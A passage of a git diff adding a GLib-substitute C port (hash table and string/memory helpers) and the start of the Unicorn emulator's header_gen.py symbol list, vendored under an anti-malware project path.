#GHashTable. + **/ +GHashTable *g_hash_table_new(GHashFunc hash_func, GEqualFunc key_equal_func) +{ + return g_hash_table_new_full(hash_func, key_equal_func, NULL, NULL); +} + +/** + * g_hash_table_new_full: + * @hash_func: a function to create a hash value from a key. + * @key_equal_func: a function to check two keys for equality. 
+ * @key_destroy_func: a function to free the memory allocated for the key
+ * used when removing the entry from the #GHashTable or %NULL if you
+ * don't want to supply such a function.
+ * @value_destroy_func: a function to free the memory allocated for the
+ * value used when removing the entry from the #GHashTable or %NULL if
+ * you don't want to supply such a function.
+ *
+ * Creates a new #GHashTable like g_hash_table_new() with a reference count
+ * of 1 and allows to specify functions to free the memory allocated for the
+ * key and value that get called when removing the entry from the #GHashTable.
+ *
+ * Return value: a new #GHashTable.
+ **/
+GHashTable* g_hash_table_new_full (GHashFunc hash_func,
+ GEqualFunc key_equal_func,
+ GDestroyNotify key_destroy_func,
+ GDestroyNotify value_destroy_func)
+{
+ GHashTable *hash_table;
+
+ /* Plain g_malloc replaces the GLib slice allocator in this port. */
+ hash_table = (GHashTable*)g_malloc(sizeof(GHashTable));
+ //hash_table = g_slice_new (GHashTable);
+ g_hash_table_set_shift (hash_table, HASH_TABLE_MIN_SHIFT);
+ hash_table->nnodes = 0;
+ hash_table->noccupied = 0;
+ /* A NULL hash_func falls back to hashing the pointer value itself. */
+ hash_table->hash_func = hash_func ? hash_func : g_direct_hash;
+ hash_table->key_equal_func = key_equal_func;
+ hash_table->ref_count = 1;
+ hash_table->key_destroy_func = key_destroy_func;
+ hash_table->value_destroy_func = value_destroy_func;
+ hash_table->nodes = g_new0 (GHashNode, hash_table->size);
+
+ return hash_table;
+}
+
+/*
+ * g_hash_table_remove_all_nodes:
+ * @hash_table: our #GHashTable
+ * @notify: %TRUE if the destroy notify handlers are to be called
+ *
+ * Removes all nodes from the table. Since this may be a precursor to
+ * freeing the table entirely, no resize is performed.
+ *
+ * If @notify is %TRUE then the destroy notify functions are called
+ * for the key and value of the hash node.
+ */
+static void g_hash_table_remove_all_nodes (GHashTable *hash_table,
+ gboolean notify)
+{
+ int i;
+
+ for (i = 0; i < hash_table->size; i++)
+ {
+ GHashNode *node = &hash_table->nodes [i];
+
+ /* key_hash == 0 marks an empty slot and key_hash == 1 a tombstone
+ * (see g_hash_table_remove_node), so only > 1 is a live entry. */
+ if (node->key_hash > 1)
+ {
+ if (notify && hash_table->key_destroy_func)
+ hash_table->key_destroy_func (node->key);
+
+ if (notify && hash_table->value_destroy_func)
+ hash_table->value_destroy_func (node->value);
+ }
+ }
+
+ /* We need to set node->key_hash = 0 for all nodes - might as well be GC
+ * friendly and clear everything */
+ memset (hash_table->nodes, 0, hash_table->size * sizeof (GHashNode));
+
+ hash_table->nnodes = 0;
+ hash_table->noccupied = 0;
+}
+
+/**
+ * g_hash_table_remove_all:
+ * @hash_table: a #GHashTable
+ *
+ * Removes all keys and their associated values from a #GHashTable.
+ *
+ * If the #GHashTable was created using g_hash_table_new_full(), the keys
+ * and values are freed using the supplied destroy functions, otherwise you
+ * have to make sure that any dynamically allocated values are freed
+ * yourself.
+ *
+ * Since: 2.12
+ **/
+void g_hash_table_remove_all (GHashTable *hash_table)
+{
+ if (hash_table == NULL) return;
+
+ g_hash_table_remove_all_nodes (hash_table, TRUE);
+ g_hash_table_maybe_resize (hash_table);
+}
+
+/*
+ * g_hash_table_remove_node:
+ * @hash_table: our #GHashTable
+ * @node: pointer to node to remove
+ * @notify: %TRUE if the destroy notify handlers are to be called
+ *
+ * Removes a node from the hash table and updates the node count.
+ * The node is replaced by a tombstone. No table resize is performed.
+ *
+ * If @notify is %TRUE then the destroy notify functions are called
+ * for the key and value of the hash node.
+ */
+static void g_hash_table_remove_node (GHashTable *hash_table,
+ GHashNode *node,
+ gboolean notify)
+{
+ if (notify && hash_table->key_destroy_func)
+ hash_table->key_destroy_func (node->key);
+
+ if (notify && hash_table->value_destroy_func)
+ hash_table->value_destroy_func (node->value);
+
+ /* Erect tombstone */
+ node->key_hash = 1;
+
+ /* Be GC friendly */
+ node->key = NULL;
+ node->value = NULL;
+
+ hash_table->nnodes--;
+}
+/*
+ * g_hash_table_remove_internal:
+ * @hash_table: our #GHashTable
+ * @key: the key to remove
+ * @notify: %TRUE if the destroy notify handlers are to be called
+ * Return value: %TRUE if a node was found and removed, else %FALSE
+ *
+ * Implements the common logic for the g_hash_table_remove() and
+ * g_hash_table_steal() functions.
+ *
+ * Do a lookup of @key and remove it if it is found, calling the
+ * destroy notify handlers only if @notify is %TRUE.
+ */
+static gboolean g_hash_table_remove_internal (GHashTable *hash_table,
+ gconstpointer key,
+ gboolean notify)
+{
+ GHashNode *node;
+ guint node_index;
+
+ if (hash_table == NULL) return FALSE;
+
+ node_index = g_hash_table_lookup_node (hash_table, key);
+ node = &hash_table->nodes [node_index];
+
+ /* g_hash_table_lookup_node() never returns a tombstone, so this is safe */
+ if (!node->key_hash)
+ return FALSE;
+
+ g_hash_table_remove_node (hash_table, node, notify);
+ g_hash_table_maybe_resize (hash_table);
+
+ return TRUE;
+}
+/**
+ * g_hash_table_remove:
+ * @hash_table: a #GHashTable.
+ * @key: the key to remove.
+ *
+ * Removes a key and its associated value from a #GHashTable.
+ *
+ * If the #GHashTable was created using g_hash_table_new_full(), the
+ * key and value are freed using the supplied destroy functions, otherwise
+ * you have to make sure that any dynamically allocated values are freed
+ * yourself.
+ *
+ * Return value: %TRUE if the key was found and removed from the #GHashTable.
+ **/
+gboolean g_hash_table_remove (GHashTable *hash_table,
+ gconstpointer key)
+{
+ return g_hash_table_remove_internal (hash_table, key, TRUE);
+}
+
+/**
+ * g_hash_table_unref:
+ * @hash_table: a valid #GHashTable.
+ *
+ * Atomically decrements the reference count of @hash_table by one.
+ * If the reference count drops to 0, all keys and values will be
+ * destroyed, and all memory allocated by the hash table is released.
+ * This function is MT-safe and may be called from any thread.
+ *
+ * Since: 2.10
+ **/
+void g_hash_table_unref (GHashTable *hash_table)
+{
+ if (hash_table == NULL) return;
+ if (hash_table->ref_count == 0) return;
+
+ /* NOTE(review): unlike the GLib original described above, this decrement
+ * is a plain -- and not atomic, so the "MT-safe" claim in the comment
+ * only holds for single-threaded use -- confirm callers. */
+ hash_table->ref_count--;
+ if (hash_table->ref_count == 0) {
+ g_hash_table_remove_all_nodes (hash_table, TRUE);
+ g_free (hash_table->nodes);
+ g_free (hash_table);
+ }
+}
+
+/**
+ * g_hash_table_ref:
+ * @hash_table: a valid #GHashTable.
+ *
+ * Atomically increments the reference count of @hash_table by one.
+ * This function is MT-safe and may be called from any thread.
+ *
+ * Return value: the passed in #GHashTable.
+ * + * Since: 2.10 + **/ +GHashTable *g_hash_table_ref (GHashTable *hash_table) +{ + if (hash_table == NULL) return NULL; + if (hash_table->ref_count == 0) return hash_table; + + //g_atomic_int_add (&hash_table->ref_count, 1); + hash_table->ref_count++; + return hash_table; +} + +guint g_hash_table_size(GHashTable *hash_table) +{ + if (hash_table == NULL) return 0; + + return hash_table->nnodes; +} + +/* END of g_hash_table related functions */ + +/* general g_XXX substitutes */ + +void g_free(gpointer ptr) +{ + free(ptr); +} + +gpointer g_malloc(size_t size) +{ + void *res; + if (size == 0) return NULL; + res = malloc(size); + if (res == NULL) exit(1); + return res; +} + +gpointer g_malloc0(size_t size) +{ + void *res; + if (size == 0) return NULL; + res = calloc(size, 1); + if (res == NULL) exit(1); + return res; +} + +gpointer g_try_malloc0(size_t size) +{ + if (size == 0) return NULL; + return calloc(size, 1); +} + +gpointer g_realloc(gpointer ptr, size_t size) +{ + void *res; + if (size == 0) { + free(ptr); + return NULL; + } + res = realloc(ptr, size); + if (res == NULL) exit(1); + return res; +} + +char *g_strdup(const char *str) +{ +#ifdef _MSC_VER + return str ? _strdup(str) : NULL; +#else + return str ? strdup(str) : NULL; +#endif +} + +char *g_strdup_printf(const char *format, ...) 
+{ + va_list ap; + char *res; + va_start(ap, format); + res = g_strdup_vprintf(format, ap); + va_end(ap); + return res; +} + +char *g_strdup_vprintf(const char *format, va_list ap) +{ + char *str_res = NULL; +#ifdef _MSC_VER + int len = _vscprintf(format, ap); + if( len < 0 ) + return NULL; + str_res = (char *)malloc(len+1); + if(str_res==NULL) + return NULL; + vsnprintf(str_res, len+1, format, ap); +#else + int ret = vasprintf(&str_res, format, ap); + if (ret == -1) { + return NULL; + } +#endif + return str_res; +} + +char *g_strndup(const char *str, size_t n) +{ + /* try to mimic glib's g_strndup */ + char *res = calloc(n + 1, 1); + strncpy(res, str, n); + return res; +} + +void g_strfreev(char **str_array) +{ + char **p = str_array; + if (p) { + while (*p) { + free(*p++); + } + } + free(str_array); +} + +gpointer g_memdup(gconstpointer mem, size_t byte_size) +{ + if (mem) { + void *res = g_malloc(byte_size); + memcpy(res, mem, byte_size); + return res; + } + return NULL; +} + +gpointer g_new_(size_t sz, size_t n_structs) +{ + size_t need = sz * n_structs; + if ((need / sz) != n_structs) return NULL; + return g_malloc(need); +} + +gpointer g_new0_(size_t sz, size_t n_structs) +{ + size_t need = sz * n_structs; + if ((need / sz) != n_structs) return NULL; + return g_malloc0(need); +} + +gpointer g_renew_(size_t sz, gpointer mem, size_t n_structs) +{ + size_t need = sz * n_structs; + if ((need / sz) != n_structs) return NULL; + return g_realloc(mem, need); +} + +/** + * g_strconcat: + * @string1: the first string to add, which must not be %NULL + * @Varargs: a %NULL-terminated list of strings to append to the string + * + * Concatenates all of the given strings into one long string. + * The returned string should be freed with g_free() when no longer needed. + * + * Note that this function is usually not the right function to use to + * assemble a translated message from pieces, since proper translation + * often requires the pieces to be reordered. 
+ * + * <warning><para>The variable argument list <emphasis>must</emphasis> end + * with %NULL. If you forget the %NULL, g_strconcat() will start appending + * random memory junk to your string.</para></warning> + * + * Returns: a newly-allocated string containing all the string arguments + */ +gchar* g_strconcat (const gchar *string1, ...) +{ + va_list ap; + char *res; + size_t sz = strlen(string1); + va_start(ap, string1); + while (1) { + char *arg = va_arg(ap, char*); + if (arg == NULL) break; + sz += strlen(arg); + } + va_end(ap); + res = g_malloc(sz + 1); + strcpy(res, string1); + va_start(ap, string1); + while (1) { + char *arg = va_arg(ap, char*); + if (arg == NULL) break; + strcat(res, arg); + } + va_end(ap); + return res; +} + +/** + * g_strsplit: + * @string: a string to split. + * @delimiter: a string which specifies the places at which to split the string. + * The delimiter is not included in any of the resulting strings, unless + * @max_tokens is reached. + * @max_tokens: the maximum number of pieces to split @string into. If this is + * less than 1, the string is split completely. + * + * Splits a string into a maximum of @max_tokens pieces, using the given + * @delimiter. If @max_tokens is reached, the remainder of @string is appended + * to the last token. + * + * As a special case, the result of splitting the empty string "" is an empty + * vector, not a vector containing a single string. The reason for this + * special case is that being able to represent a empty vector is typically + * more useful than consistent handling of empty elements. If you do need + * to represent empty elements, you'll need to check for the empty string + * before calling g_strsplit(). + * + * Return value: a newly-allocated %NULL-terminated array of strings. Use + * g_strfreev() to free it. 
+ **/ +gchar** g_strsplit (const gchar *string, + const gchar *delimiter, + gint max_tokens) +{ + GSList *string_list = NULL, *slist; + gchar **str_array, *s; + guint n = 0; + const gchar *remainder; + + if (string == NULL) return NULL; + if (delimiter == NULL) return NULL; + if (delimiter[0] == '\0') return NULL; + + if (max_tokens < 1) + max_tokens = G_MAXINT; + + remainder = string; + s = strstr (remainder, delimiter); + if (s) + { + gsize delimiter_len = strlen (delimiter); + + while (--max_tokens && s) + { + gsize len; + + len = s - remainder; + string_list = g_slist_prepend (string_list, + g_strndup (remainder, len)); + n++; + remainder = s + delimiter_len; + s = strstr (remainder, delimiter); + } + } + if (*string) + { + n++; + string_list = g_slist_prepend (string_list, g_strdup (remainder)); + } + + str_array = g_new (gchar*, n + 1); + + str_array[n--] = NULL; + for (slist = string_list; slist; slist = slist->next) + str_array[n--] = slist->data; + + g_slist_free (string_list); + + return str_array; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/header_gen.py b/ai_anti_malware/unicorn/unicorn-master/qemu/header_gen.py new file mode 100644 index 0000000..253bd3e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/header_gen.py @@ -0,0 +1,4085 @@ +#!/usr/bin/python +# Unicorn Emulator Engine +# By Dang Hoang Vu & Nguyen Anh Quynh + +# syntax: ./header_gen.py <arm|aarch64|x86|name> + +import sys + +symbols = ( + 'arm_release', + 'aarch64_tb_set_jmp_target', + 'ppc_tb_set_jmp_target', + 'use_idiv_instructions_rt', + 'tcg_target_deposit_valid', + 'helper_power_down', + 'check_exit_request', + 'address_space_unregister', + 'tb_invalidate_phys_page_fast', + 'phys_mem_clean', + 'tb_cleanup', + 'memory_map', + 'memory_map_ptr', + 'memory_unmap', + 'memory_free', + 'free_code_gen_buffer', + 'helper_raise_exception', + 'tcg_enabled', + 'tcg_exec_init', + 'memory_register_types', + 'cpu_exec_init_all', + 'vm_start', + 'resume_all_vcpus', + 
'a15_l2ctlr_read', + 'a64_translate_init', + 'aa32_generate_debug_exceptions', + 'aa64_cacheop_access', + 'aa64_daif_access', + 'aa64_daif_write', + 'aa64_dczid_read', + 'aa64_fpcr_read', + 'aa64_fpcr_write', + 'aa64_fpsr_read', + 'aa64_fpsr_write', + 'aa64_generate_debug_exceptions', + 'aa64_zva_access', + 'aarch64_banked_spsr_index', + 'aarch64_restore_sp', + 'aarch64_save_sp', + 'accel_find', + 'accel_init_machine', + 'accel_type', + 'access_with_adjusted_size', + 'add128', + 'add16_sat', + 'add16_usat', + 'add192', + 'add8_sat', + 'add8_usat', + 'add_cpreg_to_hashtable', + 'add_cpreg_to_list', + 'addFloat128Sigs', + 'addFloat32Sigs', + 'addFloat64Sigs', + 'addFloatx80Sigs', + 'add_qemu_ldst_label', + 'address_space_access_valid', + 'address_space_destroy', + 'address_space_destroy_dispatch', + 'address_space_get_flatview', + 'address_space_init', + 'address_space_init_dispatch', + 'address_space_lookup_region', + 'address_space_map', + 'address_space_read', + 'address_space_rw', + 'address_space_translate', + 'address_space_translate_for_iotlb', + 'address_space_translate_internal', + 'address_space_unmap', + 'address_space_update_topology', + 'address_space_update_topology_pass', + 'address_space_write', + 'addrrange_contains', + 'addrrange_end', + 'addrrange_equal', + 'addrrange_intersection', + 'addrrange_intersects', + 'addrrange_make', + 'adjust_endianness', + 'all_helpers', + 'alloc_code_gen_buffer', + 'alloc_entry', + 'always_true', + 'arm1026_initfn', + 'arm1136_initfn', + 'arm1136_r2_initfn', + 'arm1176_initfn', + 'arm11mpcore_initfn', + 'arm926_initfn', + 'arm946_initfn', + 'arm_ccnt_enabled', + 'arm_cp_read_zero', + 'arm_cp_reset_ignore', + 'arm_cpu_do_interrupt', + 'arm_cpu_exec_interrupt', + 'arm_cpu_finalizefn', + 'arm_cpu_get_phys_page_debug', + 'arm_cpu_handle_mmu_fault', + 'arm_cpu_initfn', + 'arm_cpu_list', + 'cpu_loop_exit', + 'arm_cpu_post_init', + 'arm_cpu_realizefn', + 'arm_cpu_register_gdb_regs_for_features', + 'arm_cpu_register_types', + 
'cpu_resume_from_signal', + 'arm_cpus', + 'arm_cpu_set_pc', + 'arm_cp_write_ignore', + 'arm_current_el', + 'arm_dc_feature', + 'arm_debug_excp_handler', + 'arm_debug_target_el', + 'arm_el_is_aa64', + 'arm_env_get_cpu', + 'arm_excp_target_el', + 'arm_excp_unmasked', + 'arm_feature', + 'arm_generate_debug_exceptions', + 'gen_intermediate_code', + 'gen_intermediate_code_pc', + 'arm_gen_test_cc', + 'arm_gt_ptimer_cb', + 'arm_gt_vtimer_cb', + 'arm_handle_psci_call', + 'arm_is_psci_call', + 'arm_is_secure', + 'arm_is_secure_below_el3', + 'arm_ldl_code', + 'arm_lduw_code', + 'arm_log_exception', + 'arm_reg_read', + 'arm_reg_reset', + 'arm_reg_write', + 'restore_state_to_opc', + 'arm_rmode_to_sf', + 'arm_singlestep_active', + 'tlb_fill', + 'tlb_flush', + 'tlb_flush_page', + 'tlb_set_page', + 'arm_translate_init', + 'arm_v7m_class_init', + 'arm_v7m_cpu_do_interrupt', + 'ats_access', + 'ats_write', + 'bad_mode_switch', + 'bank_number', + 'bitmap_zero_extend', + 'bp_wp_matches', + 'breakpoint_invalidate', + 'build_page_bitmap', + 'bus_add_child', + 'bus_class_init', + 'bus_info', + 'bus_unparent', + 'cache_block_ops_cp_reginfo', + 'cache_dirty_status_cp_reginfo', + 'cache_test_clean_cp_reginfo', + 'call_recip_estimate', + 'can_merge', + 'capacity_increase', + 'ccsidr_read', + 'check_ap', + 'check_breakpoints', + 'check_watchpoints', + 'cho', + 'clear_bit', + 'clz32', + 'clz64', + 'cmp_flatrange_addr', + 'code_gen_alloc', + 'commonNaNToFloat128', + 'commonNaNToFloat16', + 'commonNaNToFloat32', + 'commonNaNToFloat64', + 'commonNaNToFloatx80', + 'compute_abs_deadline', + 'cond_name', + 'configure_accelerator', + 'container_get', + 'container_info', + 'container_register_types', + 'contextidr_write', + 'core_log_global_start', + 'core_log_global_stop', + 'core_memory_listener', + 'cortexa15_cp_reginfo', + 'cortex_a15_initfn', + 'cortexa8_cp_reginfo', + 'cortex_a8_initfn', + 'cortexa9_cp_reginfo', + 'cortex_a9_initfn', + 'cortex_m3_initfn', + 'count_cpreg', + 
'countLeadingZeros32', + 'countLeadingZeros64', + 'cp_access_ok', + 'cpacr_write', + 'cpreg_field_is_64bit', + 'cp_reginfo', + 'cpreg_key_compare', + 'cpreg_make_keylist', + 'cp_reg_reset', + 'cpreg_to_kvm_id', + 'cpsr_read', + 'cpsr_write', + 'cptype_valid', + 'cpu_abort', + 'cpu_arm_exec', + 'cpu_arm_gen_code', + 'cpu_arm_init', + 'cpu_breakpoint_insert', + 'cpu_breakpoint_remove', + 'cpu_breakpoint_remove_all', + 'cpu_breakpoint_remove_by_ref', + 'cpu_can_do_io', + 'cpu_can_run', + 'cpu_class_init', + 'cpu_common_class_by_name', + 'cpu_common_exec_interrupt', + 'cpu_common_get_arch_id', + 'cpu_common_get_memory_mapping', + 'cpu_common_get_paging_enabled', + 'cpu_common_has_work', + 'cpu_common_initfn', + 'cpu_common_noop', + 'cpu_common_parse_features', + 'cpu_common_realizefn', + 'cpu_common_reset', + 'cpu_dump_statistics', + 'cpu_exec_init', + 'cpu_flush_icache_range', + 'cpu_gen_init', + 'cpu_get_clock', + 'cpu_get_real_ticks', + 'cpu_get_tb_cpu_state', + 'cpu_handle_debug_exception', + 'cpu_handle_guest_debug', + 'cpu_inb', + 'cpu_inl', + 'cpu_interrupt', + 'cpu_interrupt_handler', + 'cpu_inw', + 'cpu_io_recompile', + 'cpu_is_stopped', + 'cpu_ldl_code', + 'cpu_ldub_code', + 'cpu_lduw_code', + 'cpu_memory_rw_debug', + 'cpu_mmu_index', + 'cpu_outb', + 'cpu_outl', + 'cpu_outw', + 'cpu_physical_memory_clear_dirty_range', + 'cpu_physical_memory_get_clean', + 'cpu_physical_memory_get_dirty', + 'cpu_physical_memory_get_dirty_flag', + 'cpu_physical_memory_is_clean', + 'cpu_physical_memory_is_io', + 'cpu_physical_memory_map', + 'cpu_physical_memory_range_includes_clean', + 'cpu_physical_memory_reset_dirty', + 'cpu_physical_memory_rw', + 'cpu_physical_memory_set_dirty_flag', + 'cpu_physical_memory_set_dirty_range', + 'cpu_physical_memory_unmap', + 'cpu_physical_memory_write_rom', + 'cpu_physical_memory_write_rom_internal', + 'cpu_register', + 'cpu_register_types', + 'cpu_restore_state', + 'cpu_restore_state_from_tb', + 'cpu_single_step', + 'cpu_tb_exec', + 
'cpu_tlb_reset_dirty_all', + 'cpu_to_be64', + 'cpu_to_le32', + 'cpu_to_le64', + 'cpu_type_info', + 'cpu_unassigned_access', + 'cpu_watchpoint_address_matches', + 'cpu_watchpoint_insert', + 'cpu_watchpoint_remove', + 'cpu_watchpoint_remove_all', + 'cpu_watchpoint_remove_by_ref', + 'crc32c_table', + 'create_new_memory_mapping', + 'csselr_write', + 'cto32', + 'ctr_el0_access', + 'ctz32', + 'ctz64', + 'dacr_write', + 'dbgbcr_write', + 'dbgbvr_write', + 'dbgwcr_write', + 'dbgwvr_write', + 'debug_cp_reginfo', + 'debug_frame', + 'debug_lpae_cp_reginfo', + 'define_arm_cp_regs', + 'define_arm_cp_regs_with_opaque', + 'define_debug_regs', + 'define_one_arm_cp_reg', + 'define_one_arm_cp_reg_with_opaque', + 'deposit32', + 'deposit64', + 'deregister_tm_clones', + 'device_class_base_init', + 'device_class_init', + 'device_finalize', + 'device_get_realized', + 'device_initfn', + 'device_post_init', + 'device_reset', + 'device_set_realized', + 'device_type_info', + 'disas_arm_insn', + 'disas_coproc_insn', + 'disas_dsp_insn', + 'disas_iwmmxt_insn', + 'disas_neon_data_insn', + 'disas_neon_ls_insn', + 'disas_thumb2_insn', + 'disas_thumb_insn', + 'disas_vfp_insn', + 'disas_vfp_v8_insn', + 'do_arm_semihosting', + 'do_clz16', + 'do_clz8', + 'do_constant_folding', + 'do_constant_folding_2', + 'do_constant_folding_cond', + 'do_constant_folding_cond2', + 'do_constant_folding_cond_32', + 'do_constant_folding_cond_64', + 'do_constant_folding_cond_eq', + 'do_fcvt_f16_to_f32', + 'do_fcvt_f32_to_f16', + 'do_ssat', + 'do_usad', + 'do_usat', + 'do_v7m_exception_exit', + 'dummy_c15_cp_reginfo', + 'dummy_func', + 'dummy_section', + '_DYNAMIC', + '_edata', + '_end', + 'end_list', + 'eq128', + 'ErrorClass_lookup', + 'error_copy', + 'error_exit', + 'error_get_class', + 'error_get_pretty', + 'error_setg_file_open', + 'estimateDiv128To64', + 'estimateSqrt32', + 'excnames', + 'excp_is_internal', + 'extended_addresses_enabled', + 'extended_mpu_ap_bits', + 'extract32', + 'extract64', + 'extractFloat128Exp', 
+ 'extractFloat128Frac0', + 'extractFloat128Frac1', + 'extractFloat128Sign', + 'extractFloat16Exp', + 'extractFloat16Frac', + 'extractFloat16Sign', + 'extractFloat32Exp', + 'extractFloat32Frac', + 'extractFloat32Sign', + 'extractFloat64Exp', + 'extractFloat64Frac', + 'extractFloat64Sign', + 'extractFloatx80Exp', + 'extractFloatx80Frac', + 'extractFloatx80Sign', + 'fcse_write', + 'find_better_copy', + 'find_default_machine', + 'find_desc_by_name', + 'find_first_bit', + 'find_paging_enabled_cpu', + 'find_ram_block', + 'find_ram_offset', + 'find_string', + 'find_type', + '_fini', + 'flatrange_equal', + 'flatview_destroy', + 'flatview_init', + 'flatview_insert', + 'flatview_lookup', + 'flatview_ref', + 'flatview_simplify', + 'flatview_unref', + 'float128_add', + 'float128_compare', + 'float128_compare_internal', + 'float128_compare_quiet', + 'float128_default_nan', + 'float128_div', + 'float128_eq', + 'float128_eq_quiet', + 'float128_is_quiet_nan', + 'float128_is_signaling_nan', + 'float128_le', + 'float128_le_quiet', + 'float128_lt', + 'float128_lt_quiet', + 'float128_maybe_silence_nan', + 'float128_mul', + 'float128_rem', + 'float128_round_to_int', + 'float128_scalbn', + 'float128_sqrt', + 'float128_sub', + 'float128ToCommonNaN', + 'float128_to_float32', + 'float128_to_float64', + 'float128_to_floatx80', + 'float128_to_int32', + 'float128_to_int32_round_to_zero', + 'float128_to_int64', + 'float128_to_int64_round_to_zero', + 'float128_unordered', + 'float128_unordered_quiet', + 'float16_default_nan', + 'float16_is_quiet_nan', + 'float16_is_signaling_nan', + 'float16_maybe_silence_nan', + 'float16ToCommonNaN', + 'float16_to_float32', + 'float16_to_float64', + 'float32_abs', + 'float32_add', + 'float32_chs', + 'float32_compare', + 'float32_compare_internal', + 'float32_compare_quiet', + 'float32_default_nan', + 'float32_div', + 'float32_eq', + 'float32_eq_quiet', + 'float32_exp2', + 'float32_exp2_coefficients', + 'float32_is_any_nan', + 'float32_is_infinity', + 
'float32_is_neg', + 'float32_is_quiet_nan', + 'float32_is_signaling_nan', + 'float32_is_zero', + 'float32_is_zero_or_denormal', + 'float32_le', + 'float32_le_quiet', + 'float32_log2', + 'float32_lt', + 'float32_lt_quiet', + 'float32_max', + 'float32_maxnum', + 'float32_maxnummag', + 'float32_maybe_silence_nan', + 'float32_min', + 'float32_minmax', + 'float32_minnum', + 'float32_minnummag', + 'float32_mul', + 'float32_muladd', + 'float32_rem', + 'float32_round_to_int', + 'float32_scalbn', + 'float32_set_sign', + 'float32_sqrt', + 'float32_squash_input_denormal', + 'float32_sub', + 'float32ToCommonNaN', + 'float32_to_float128', + 'float32_to_float16', + 'float32_to_float64', + 'float32_to_floatx80', + 'float32_to_int16', + 'float32_to_int16_round_to_zero', + 'float32_to_int32', + 'float32_to_int32_round_to_zero', + 'float32_to_int64', + 'float32_to_int64_round_to_zero', + 'float32_to_uint16', + 'float32_to_uint16_round_to_zero', + 'float32_to_uint32', + 'float32_to_uint32_round_to_zero', + 'float32_to_uint64', + 'float32_to_uint64_round_to_zero', + 'float32_unordered', + 'float32_unordered_quiet', + 'float64_abs', + 'float64_add', + 'float64_chs', + 'float64_compare', + 'float64_compare_internal', + 'float64_compare_quiet', + 'float64_default_nan', + 'float64_div', + 'float64_eq', + 'float64_eq_quiet', + 'float64_is_any_nan', + 'float64_is_infinity', + 'float64_is_neg', + 'float64_is_quiet_nan', + 'float64_is_signaling_nan', + 'float64_is_zero', + 'float64_le', + 'float64_le_quiet', + 'float64_log2', + 'float64_lt', + 'float64_lt_quiet', + 'float64_max', + 'float64_maxnum', + 'float64_maxnummag', + 'float64_maybe_silence_nan', + 'float64_min', + 'float64_minmax', + 'float64_minnum', + 'float64_minnummag', + 'float64_mul', + 'float64_muladd', + 'float64_rem', + 'float64_round_to_int', + 'float64_scalbn', + 'float64_set_sign', + 'float64_sqrt', + 'float64_squash_input_denormal', + 'float64_sub', + 'float64ToCommonNaN', + 'float64_to_float128', + 'float64_to_float16', + 
'float64_to_float32', + 'float64_to_floatx80', + 'float64_to_int16', + 'float64_to_int16_round_to_zero', + 'float64_to_int32', + 'float64_to_int32_round_to_zero', + 'float64_to_int64', + 'float64_to_int64_round_to_zero', + 'float64_to_uint16', + 'float64_to_uint16_round_to_zero', + 'float64_to_uint32', + 'float64_to_uint32_round_to_zero', + 'float64_to_uint64', + 'float64_to_uint64_round_to_zero', + 'float64_trunc_to_int', + 'float64_unordered', + 'float64_unordered_quiet', + 'float_raise', + 'floatx80_add', + 'floatx80_compare', + 'floatx80_compare_internal', + 'floatx80_compare_quiet', + 'floatx80_default_nan', + 'floatx80_div', + 'floatx80_eq', + 'floatx80_eq_quiet', + 'floatx80_is_quiet_nan', + 'floatx80_is_signaling_nan', + 'floatx80_le', + 'floatx80_le_quiet', + 'floatx80_lt', + 'floatx80_lt_quiet', + 'floatx80_maybe_silence_nan', + 'floatx80_mul', + 'floatx80_rem', + 'floatx80_round_to_int', + 'floatx80_scalbn', + 'floatx80_sqrt', + 'floatx80_sub', + 'floatx80ToCommonNaN', + 'floatx80_to_float128', + 'floatx80_to_float32', + 'floatx80_to_float64', + 'floatx80_to_int32', + 'floatx80_to_int32_round_to_zero', + 'floatx80_to_int64', + 'floatx80_to_int64_round_to_zero', + 'floatx80_unordered', + 'floatx80_unordered_quiet', + 'flush_icache_range', + 'format_string', + 'fp_decode_rm', + 'frame_dummy', + 'free_range', + 'fstat64', + 'futex_wait', + 'futex_wake', + 'gen_aa32_ld16s', + 'gen_aa32_ld16u', + 'gen_aa32_ld32u', + 'gen_aa32_ld64', + 'gen_aa32_ld8s', + 'gen_aa32_ld8u', + 'gen_aa32_st16', + 'gen_aa32_st32', + 'gen_aa32_st64', + 'gen_aa32_st8', + 'gen_adc', + 'gen_adc_CC', + 'gen_add16', + 'gen_add_carry', + 'gen_add_CC', + 'gen_add_datah_offset', + 'gen_add_data_offset', + 'gen_addq', + 'gen_addq_lo', + 'gen_addq_msw', + 'gen_arm_parallel_addsub', + 'gen_arm_shift_im', + 'gen_arm_shift_reg', + 'gen_bx', + 'gen_bx_im', + 'gen_clrex', + 'generate_memory_topology', + 'generic_timer_cp_reginfo', + 'gen_exception', + 'gen_exception_insn', + 
'gen_exception_internal', + 'gen_exception_internal_insn', + 'gen_exception_return', + 'gen_goto_tb', + 'gen_helper_access_check_cp_reg', + 'gen_helper_add_saturate', + 'gen_helper_add_setq', + 'gen_helper_clear_pstate_ss', + 'gen_helper_clz32', + 'gen_helper_clz64', + 'gen_helper_clz_arm', + 'gen_helper_cpsr_read', + 'gen_helper_cpsr_write', + 'gen_helper_crc32_arm', + 'gen_helper_crc32c', + 'gen_helper_crypto_aese', + 'gen_helper_crypto_aesmc', + 'gen_helper_crypto_sha1_3reg', + 'gen_helper_crypto_sha1h', + 'gen_helper_crypto_sha1su1', + 'gen_helper_crypto_sha256h', + 'gen_helper_crypto_sha256h2', + 'gen_helper_crypto_sha256su0', + 'gen_helper_crypto_sha256su1', + 'gen_helper_double_saturate', + 'gen_helper_exception_internal', + 'gen_helper_exception_with_syndrome', + 'gen_helper_get_cp_reg', + 'gen_helper_get_cp_reg64', + 'gen_helper_get_r13_banked', + 'gen_helper_get_user_reg', + 'gen_helper_iwmmxt_addcb', + 'gen_helper_iwmmxt_addcl', + 'gen_helper_iwmmxt_addcw', + 'gen_helper_iwmmxt_addnb', + 'gen_helper_iwmmxt_addnl', + 'gen_helper_iwmmxt_addnw', + 'gen_helper_iwmmxt_addsb', + 'gen_helper_iwmmxt_addsl', + 'gen_helper_iwmmxt_addsw', + 'gen_helper_iwmmxt_addub', + 'gen_helper_iwmmxt_addul', + 'gen_helper_iwmmxt_adduw', + 'gen_helper_iwmmxt_align', + 'gen_helper_iwmmxt_avgb0', + 'gen_helper_iwmmxt_avgb1', + 'gen_helper_iwmmxt_avgw0', + 'gen_helper_iwmmxt_avgw1', + 'gen_helper_iwmmxt_bcstb', + 'gen_helper_iwmmxt_bcstl', + 'gen_helper_iwmmxt_bcstw', + 